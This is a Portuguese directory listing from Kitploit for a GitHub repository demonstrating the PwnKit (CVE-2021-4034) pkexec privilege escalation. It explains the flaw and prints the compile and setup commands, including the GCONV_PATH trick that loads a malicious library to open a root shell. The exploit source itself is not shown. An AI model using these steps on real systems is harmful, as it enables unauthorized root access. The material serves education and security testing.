Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-4034-PwnKit- — Este repositório mostra como explorar a vulnerabilidade CVE-2021-4034. | Kitploit
Ferramentas/GitHubGitHub/igonzalez357/cve-2021-4034-pwnkit-
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoExploração de Binários
GitHubigonzalez357/cve-2021-4034-pwnkit-

CVE-2021-4034-PwnKit-

Este repositório mostra como explorar a vulnerabilidade CVE-2021-4034.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
1há 1 anoAinda não revisado

CVE-2021-4034 (PwnKit) - Análise e Exploração

Este repositório contém o código-fonte para demonstrar a exploração da vulnerabilidade CVE-2021-4034, também conhecida como PwnKit, descoberta em pkexec (parte do pacote Polkit). Esta falha permite uma escalada local de privilégios para root através do uso de variáveis de ambiente maliciosas.


⚠️ Aviso

Este código é fornecido apenas para fins educacionais e de pesquisa. Não deve ser utilizado em sistemas de produção nem sem autorização expressa. O uso indevido pode ser ilegal e vai contra os termos de uso do autor.


🧠 Descrição técnica

A vulnerabilidade ocorre quando pkexec é executado sem argumentos, ou seja, argc == 0. Neste caso, pkexec tenta acessar argv[1] sem verificar se argv[0] existe, fazendo com que leia a partir de envp[0]. Isso permite ao atacante:

  • Ler e sobrescrever variáveis de ambiente como GCONV_PATH.
  • Forçar o carregamento de uma biblioteca .so arbitrária para executar código como root.

O exploit aproveita essa condição para carregar uma biblioteca maliciosa que abre um shell como usuário root.


📁 Arquivos do repositório

  • cve-2021-4034.c: Código-fonte do exploit que invoca pkexec com argv[] = {NULL} e variáveis de ambiente modificadas.
  • pwnkit.c: Código-fonte da biblioteca maliciosa que abre um shell como root.

🛠️ Compilação

root@kitploit:~
gcc -Wall -o cve-2021-4034 cve-2021-4034.c
gcc -Wall -shared -fPIC -o pwnkit.so pwnkit.c

🧪 Instruções de uso (Preparação do ambiente e execução)

root@kitploit:~
mkdir GCONV_PATH=.
echo 'module UTF-8// PWNKIT// pwnkit 1' > gconv-modules
cp $(which true) GCONV_PATH=./pwnkit.so:.

./cve-2021-4034
Baixar ferramenta